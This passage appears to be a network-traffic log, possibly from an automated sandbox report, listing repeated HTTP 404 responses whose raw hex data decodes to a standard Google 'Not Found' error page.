64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 